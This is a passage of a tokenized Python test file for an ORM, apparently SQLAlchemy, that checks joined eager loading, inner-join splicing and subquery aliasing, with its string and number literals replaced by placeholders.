<EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( Item , secondary = order_items , <EOL> order_by = items . c . id ) , <EOL> } ) <EOL> mapper ( Item , items , properties = { <EOL> '<STR_LIT>' : relationship ( Keyword , secondary = item_keywords , <EOL> order_by = keywords . c . id ) <EOL> } ) <EOL> mapper ( Keyword , keywords ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . join ( User . orders ) . join ( Order . items ) . options ( joinedload_all ( "<STR_LIT>" ) ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_unnested_chaining_fixed ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , lazy = False ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = False , <EOL> innerjoin = "<STR_LIT>" ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( Order ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_nested_chaining_fixed ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , lazy = False ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = False , <EOL> innerjoin = '<STR_LIT>' ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_options ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , backref = backref ( '<STR_LIT:user>' , innerjoin = True ) , <EOL> order_by = orders . c . id ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( <EOL> Item , <EOL> secondary = order_items , <EOL> order_by = items . c . id ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( joinedload ( User . orders , innerjoin = True ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload_all ( User . orders , Order . items , innerjoin = True ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( User . orders , innerjoin = True ) , <EOL> joinedload ( User . orders , Order . items , innerjoin = True ) ) . <EOL> order_by ( User . id ) . all ( ) , <EOL> [ User ( id = <NUM_LIT:7> , <EOL> orders = [ <EOL> Order ( <EOL> id = <NUM_LIT:1> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) , <EOL> Order ( <EOL> id = <NUM_LIT:3> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:3> ) , Item ( <EOL> id = <NUM_LIT:4> ) , Item ( <EOL> id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:5> , items = [ Item ( id = <NUM_LIT:5> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:9> , orders = [ <EOL> Order ( <EOL> id = <NUM_LIT:2> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ] ) <EOL> ] <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> self . assert_compile ( <EOL> sess . query ( Order ) . options ( <EOL> joinedload ( <EOL> Order . user ) ) . filter ( <EOL> Order . description == '<STR_LIT:foo>' ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_propagated_lazyload_wildcard_unbound ( self ) : <EOL> self . _test_propagated_lazyload_wildcard ( False ) <EOL> def test_propagated_lazyload_wildcard_bound ( self ) : <EOL> self . _test_propagated_lazyload_wildcard ( True ) <EOL> def _test_propagated_lazyload_wildcard ( self , use_load ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , lazy = "<STR_LIT>" ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = "<STR_LIT>" ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> if use_load : <EOL> opt = Load ( User ) . defaultload ( "<STR_LIT>" ) . lazyload ( "<STR_LIT:*>" ) <EOL> else : <EOL> opt = defaultload ( "<STR_LIT>" ) . lazyload ( "<STR_LIT:*>" ) <EOL> q = sess . query ( User ) . filter ( User . id == <NUM_LIT:7> ) . options ( opt ) <EOL> def go ( ) : <EOL> for u in q : <EOL> u . orders <EOL> self . sql_eq_ ( go , [ <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT:7> } ) , <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT:7> } ) , <EOL> ] ) <EOL> class InnerJoinSplicingTest ( fixtures . MappedTest , testing . AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> __backend__ = True <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> ) <EOL> Table ( '<STR_LIT:b>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> class A ( cls . Comparable ) : <EOL> pass <EOL> class B ( cls . Comparable ) : <EOL> pass <EOL> class C1 ( cls . Comparable ) : <EOL> pass <EOL> class C2 ( cls . Comparable ) : <EOL> pass <EOL> class D1 ( cls . Comparable ) : <EOL> pass <EOL> class D2 ( cls . Comparable ) : <EOL> pass <EOL> class E1 ( cls . Comparable ) : <EOL> pass <EOL> @ classmethod <EOL> def setup_mappers ( cls ) : <EOL> A , B , C1 , C2 , D1 , D2 , E1 = ( <EOL> cls . classes . A , cls . classes . B , cls . classes . C1 , <EOL> cls . classes . C2 , cls . classes . D1 , cls . classes . D2 , cls . classes . E1 ) <EOL> mapper ( A , cls . tables . a , properties = { <EOL> '<STR_LIT>' : relationship ( B ) <EOL> } ) <EOL> mapper ( B , cls . tables . b , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( C1 , order_by = cls . tables . c1 . c . id ) ) , <EOL> ( '<STR_LIT>' , relationship ( C2 , order_by = cls . tables . c2 . c . id ) ) <EOL> ] ) ) <EOL> mapper ( C1 , cls . tables . c1 , properties = { <EOL> '<STR_LIT>' : relationship ( D1 , order_by = cls . tables . d1 . c . id ) <EOL> } ) <EOL> mapper ( C2 , cls . tables . c2 , properties = { <EOL> '<STR_LIT>' : relationship ( D2 , order_by = cls . tables . d2 . c . id ) <EOL> } ) <EOL> mapper ( D1 , cls . tables . d1 , properties = { <EOL> '<STR_LIT>' : relationship ( E1 , order_by = cls . tables . e1 . c . id ) <EOL> } ) <EOL> mapper ( D2 , cls . tables . d2 ) <EOL> mapper ( E1 , cls . tables . e1 ) <EOL> @ classmethod <EOL> def _fixture_data ( cls ) : <EOL> A , B , C1 , C2 , D1 , D2 , E1 = ( <EOL> cls . classes . A , cls . classes . B , cls . classes . C1 , <EOL> cls . classes . C2 , cls . classes . D1 , cls . classes . D2 , cls . classes . E1 ) <EOL> return [ <EOL> A ( id = <NUM_LIT:1> , bs = [ <EOL> B ( <EOL> id = <NUM_LIT:1> , <EOL> c1s = [ C1 ( <EOL> id = <NUM_LIT:1> , value = '<STR_LIT>' , <EOL> d1s = [ <EOL> D1 ( id = <NUM_LIT:1> , e1s = [ E1 ( id = <NUM_LIT:1> ) ] ) , D1 ( id = <NUM_LIT:2> , e1s = [ E1 ( id = <NUM_LIT:2> ) ] ) <EOL> ] <EOL> ) <EOL> ] , <EOL> c2s = [ C2 ( id = <NUM_LIT:1> , value = '<STR_LIT>' , d2s = [ D2 ( id = <NUM_LIT:3> ) ] ) , <EOL> C2 ( id = <NUM_LIT:2> , value = '<STR_LIT>' , d2s = [ D2 ( id = <NUM_LIT:4> ) ] ) ] <EOL> ) , <EOL> B ( <EOL> id = <NUM_LIT:2> , <EOL> c1s = [ <EOL> C1 ( <EOL> id = <NUM_LIT:4> , value = '<STR_LIT>' , <EOL> d1s = [ D1 ( <EOL> id = <NUM_LIT:3> , e1s = [ <EOL> E1 ( id = <NUM_LIT:3> , value = '<STR_LIT>' ) , <EOL> E1 ( id = <NUM_LIT:4> , value = "<STR_LIT>" ) <EOL> ] ) , <EOL> D1 ( id = <NUM_LIT:4> , e1s = [ E1 ( id = <NUM_LIT:5> ) ] ) <EOL> ] <EOL> ) <EOL> ] , <EOL> c2s = [ C2 ( id = <NUM_LIT:4> , value = '<STR_LIT>' , d2s = [ ] ) ] <EOL> ) , <EOL> ] ) , <EOL> A ( id = <NUM_LIT:2> , bs = [ <EOL> B ( <EOL> id = <NUM_LIT:3> , <EOL> c1s = [ <EOL> C1 ( <EOL> id = <NUM_LIT:8> , <EOL> d1s = [ D1 ( id = <NUM_LIT:5> , value = '<STR_LIT>' , e1s = [ E1 ( id = <NUM_LIT:6> ) ] ) ] <EOL> ) <EOL> ] , <EOL> c2s = [ C2 ( id = <NUM_LIT:8> , d2s = [ D2 ( id = <NUM_LIT:6> , value = '<STR_LIT>' ) ] ) ] <EOL> ) <EOL> ] ) <EOL> ] <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> s = Session ( testing . db ) <EOL> s . add_all ( cls . _fixture_data ( ) ) <EOL> s . commit ( ) <EOL> def _assert_result ( self , query ) : <EOL> eq_ ( <EOL> query . all ( ) , <EOL> self . _fixture_data ( ) <EOL> ) <EOL> def test_nested_innerjoin_propagation_multiple_paths_one ( self ) : <EOL> A , B , C1 , C2 = ( <EOL> self . classes . A , self . classes . B , self . classes . C1 , <EOL> self . classes . C2 ) <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( A . bs , innerjoin = False ) . <EOL> joinedload ( B . c1s , innerjoin = True ) . <EOL> joinedload ( C1 . d1s , innerjoin = True ) , <EOL> defaultload ( A . bs ) . joinedload ( B . c2s , innerjoin = True ) . <EOL> joinedload ( C2 . d2s , innerjoin = False ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _assert_result ( q ) <EOL> def test_nested_innerjoin_propagation_multiple_paths_two ( self ) : <EOL> A = self . classes . A <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) , <EOL> joinedload ( '<STR_LIT>' ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _assert_result ( q ) <EOL> def test_multiple_splice_points ( self ) : <EOL> A = self . classes . A <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( '<STR_LIT>' , innerjoin = False ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = False ) , <EOL> joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _assert_result ( q ) <EOL> def test_splice_onto_np_mapper ( self ) : <EOL> A = self . classes . A <EOL> B = self . classes . B <EOL> C1 = self . classes . C1 <EOL> b_table = self . tables . b <EOL> c1_table = self . tables . c1 <EOL> from sqlalchemy import inspect <EOL> weird_selectable = b_table . outerjoin ( c1_table ) <EOL> b_np = mapper ( <EOL> B , weird_selectable , non_primary = True , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( C1 , lazy = False , innerjoin = True ) ) , <EOL> ( '<STR_LIT>' , c1_table . c . id ) , <EOL> ( '<STR_LIT>' , b_table . c . value ) , <EOL> ] ) <EOL> ) <EOL> a_mapper = inspect ( A ) <EOL> a_mapper . add_property ( <EOL> "<STR_LIT>" , relationship ( b_np ) <EOL> ) <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( '<STR_LIT>' , innerjoin = False ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class InnerJoinSplicingWSecondaryTest ( <EOL> fixtures . MappedTest , testing . AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> __backend__ = True <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) <EOL> Table ( <EOL> '<STR_LIT:b>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) <EOL> Table ( <EOL> '<STR_LIT:c>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> ) <EOL> Table ( '<STR_LIT:d>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> ) <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> class A ( cls . Comparable ) : <EOL> pass <EOL> class B ( cls . Comparable ) : <EOL> pass <EOL> class C ( cls . Comparable ) : <EOL> pass <EOL> class D ( cls . Comparable ) : <EOL> pass <EOL> @ classmethod <EOL> def setup_mappers ( cls ) : <EOL> A , B , C , D = ( <EOL> cls . classes . A , cls . classes . B , cls . classes . C , <EOL> cls . classes . D ) <EOL> mapper ( A , cls . tables . a , properties = { <EOL> '<STR_LIT:b>' : relationship ( B ) <EOL> } ) <EOL> mapper ( B , cls . tables . b , properties = odict ( [ <EOL> ( '<STR_LIT:c>' , relationship ( C ) ) , <EOL> ] ) ) <EOL> mapper ( C , cls . tables . c , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( D , secondary = cls . tables . ctod , <EOL> order_by = cls . tables . d . c . id ) ) , <EOL> ] ) ) <EOL> mapper ( D , cls . tables . d ) <EOL> @ classmethod <EOL> def _fixture_data ( cls ) : <EOL> A , B , C , D = ( <EOL> cls . classes . A , cls . classes . B , cls . classes . C , <EOL> cls . classes . D ) <EOL> d1 , d2 , d3 = D ( id = <NUM_LIT:1> ) , D ( id = <NUM_LIT:2> ) , D ( id = <NUM_LIT:3> ) <EOL> return [ <EOL> A ( <EOL> id = <NUM_LIT:1> , <EOL> b = B ( <EOL> id = <NUM_LIT:1> , <EOL> c = C ( <EOL> id = <NUM_LIT:1> , <EOL> ds = [ d1 , d2 ] <EOL> ) <EOL> ) <EOL> ) , <EOL> A ( <EOL> id = <NUM_LIT:2> , <EOL> b = B ( <EOL> id = <NUM_LIT:2> , <EOL> c = C ( <EOL> id = <NUM_LIT:2> , <EOL> ds = [ d2 , d3 ] <EOL> ) <EOL> ) <EOL> ) <EOL> ] <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> s = Session ( testing . db ) <EOL> s . add_all ( cls . _fixture_data ( ) ) <EOL> s . commit ( ) <EOL> def _assert_result ( self , query ) : <EOL> def go ( ) : <EOL> eq_ ( <EOL> query . all ( ) , <EOL> self . _fixture_data ( ) <EOL> ) <EOL> self . assert_sql_count ( <EOL> testing . db , <EOL> go , <EOL> <NUM_LIT:1> <EOL> ) <EOL> def test_joined_across ( self ) : <EOL> A = self . classes . A <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( '<STR_LIT:b>' ) . <EOL> joinedload ( '<STR_LIT:c>' , innerjoin = True ) . <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _assert_result ( q ) <EOL> class SubqueryAliasingTest ( fixtures . MappedTest , testing . AssertsCompiledSQL ) : <EOL> """<STR_LIT>""" <EOL> __dialect__ = '<STR_LIT:default>' <EOL> run_create_tables = None <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> ) <EOL> Table ( '<STR_LIT:b>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , Integer ) , <EOL> ) <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> class A ( cls . Comparable ) : <EOL> pass <EOL> class B ( cls . Comparable ) : <EOL> pass <EOL> def _fixture ( self , props ) : <EOL> A , B = self . classes . A , self . classes . B <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> mapper ( A , a_table , properties = props ) <EOL> mapper ( B , b_table , properties = { <EOL> '<STR_LIT:a>' : relationship ( A , backref = "<STR_LIT>" ) <EOL> } ) <EOL> def test_column_property ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) <EOL> self . _fixture ( { <EOL> '<STR_LIT>' : column_property ( cp ) <EOL> } ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( A . summation ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_column_property_desc ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) <EOL> self . _fixture ( { <EOL> '<STR_LIT>' : column_property ( cp ) <EOL> } ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( A . summation . desc ( ) ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_column_property_correlated ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) . correlate ( a_table ) <EOL> self . _fixture ( { <EOL> '<STR_LIT>' : column_property ( cp ) <EOL> } ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( A . summation ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_standalone_subquery_unlabeled ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> self . _fixture ( { } ) <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) . correlate ( a_table ) . as_scalar ( ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( cp ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_standalone_subquery_labeled ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> self . _fixture ( { } ) <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) . correlate ( a_table ) . as_scalar ( ) . label ( '<STR_LIT:foo>' ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( cp ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_standalone_negated ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> self . _fixture ( { } ) <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) . correlate ( a_table ) . as_scalar ( ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( ~ cp ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class LoadOnExistingTest ( _fixtures . FixtureTest ) : <EOL> """<STR_LIT>""" <EOL> run_inserts = '<STR_LIT>' <EOL> run_deletes = None <EOL> def _collection_to_scalar_fixture ( self ) : <EOL> User , Address , Dingaling = self . classes . User , self . classes . Address , self . classes . Dingaling <EOL> mapper ( User , self . tables 